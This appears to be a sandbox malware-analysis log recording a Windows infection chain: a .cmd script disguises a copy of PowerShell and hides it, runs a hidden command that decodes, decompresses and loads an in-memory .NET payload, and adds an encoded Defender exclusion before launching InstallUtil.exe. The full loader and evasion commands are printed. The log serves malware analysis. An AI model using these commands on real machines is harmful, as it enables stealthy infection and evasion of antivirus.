                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\gcapi64.cmd" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\AppData\Roaming\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.KwjJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\gcapi64.cmd.KwjJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\gcapi64.cmd.Kwj C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\gcapi64.cmd" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\AppData\Roaming\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: atl.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxx.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: nvapi64.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
